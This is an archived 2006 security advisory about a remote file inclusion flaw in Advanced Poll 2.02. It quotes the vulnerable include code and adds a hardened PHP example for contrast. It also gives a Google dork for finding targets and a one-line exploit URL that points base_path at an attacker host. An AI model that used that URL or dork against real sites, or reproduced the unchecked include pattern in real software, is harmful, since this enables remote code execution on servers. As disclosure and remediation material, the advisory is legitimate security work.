securityvulns SECURITYVULNS:DOC:13587
Jul 24, 2006 - 12:00 a.m.

SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion


#############################SolpotCrew Community################################

Advanced Poll ver 2.02 (base_path) Remote File Inclusion

Vendor site : http://www.proxy2.de/scripts.php

#################################################################################

Bug Found By :Solpot a.k.a (k. Hasibuan)

contact: [email protected]

Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt

################################################################################

Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,

L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy

home_edition2001 , Rendy ,Tje , m3lky , no-profile

and all crew #mardongan @ irc.dal.net

###############################################################################
Input passed to the "base_path" parameter is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from /admin/common.inc.php

// $base_path reaches the include() calls below without being verified
$pollvars['SELF'] = basename($PHP_SELF);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}
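
A hardened form of the include logic above, as an added example that is not part of the advisory or of Advanced Poll's code: the base path is set by the script itself and the language file is resolved against the lang/ directory before it is included. The function name resolve_lang_file, the sandbox directory and the sample values are assumptions made for illustration; PHP 7 or later is assumed.

```php
<?php
// Added example, not Advanced Poll's code: pick the language file without
// trusting request input. Assumed layout: <poll root>/lang/<name>.php.

/** Return the language file to include; anything unexpected gets english.php. */
function resolve_lang_file(string $langDir, $requested): string
{
    $fallback = $langDir . DIRECTORY_SEPARATOR . 'english.php';
    // Accept only a bare file name: no slashes, no URL scheme, no "..".
    if (!is_string($requested) || !preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $requested)) {
        return $fallback;
    }
    // realpath() resolves symlinks and returns false when the file is missing.
    $root = realpath($langDir);
    $candidate = realpath($langDir . DIRECTORY_SEPARATOR . $requested);
    if ($root === false || $candidate === false || !is_file($candidate)
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $candidate;
}

// Constructed sandbox standing in for the poll's lang/ directory. In the real
// script $base_path would be fixed server-side, for example dirname(__DIR__),
// and never read from the request.
$base_path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'poll_demo_' . getmypid();
$langDir = $base_path . DIRECTORY_SEPARATOR . 'lang';
@mkdir($langDir, 0700, true);
file_put_contents($langDir . '/english.php', '<?php $lang = "en";');
file_put_contents($langDir . '/german.php', '<?php $lang = "de";');

// Constructed request values, including the shapes the advisory describes
// (an external resource and a path outside lang/).
$samples = ['german.php', 'klingon.php', '../../etc/passwd',
            'http://example.invalid/x.php', ['not', 'a', 'string']];
foreach ($samples as $requested) {
    $file = resolve_lang_file($langDir, $requested);
    include $file; // always a local file under lang/
    $shown = is_string($requested) ? $requested : gettype($requested);
    printf("%-30s -> %s (lang=%s)\n", $shown, basename($file), $lang);
}
```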

google dork : inurl:comments.php?action= send id

EXPLOIT :

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################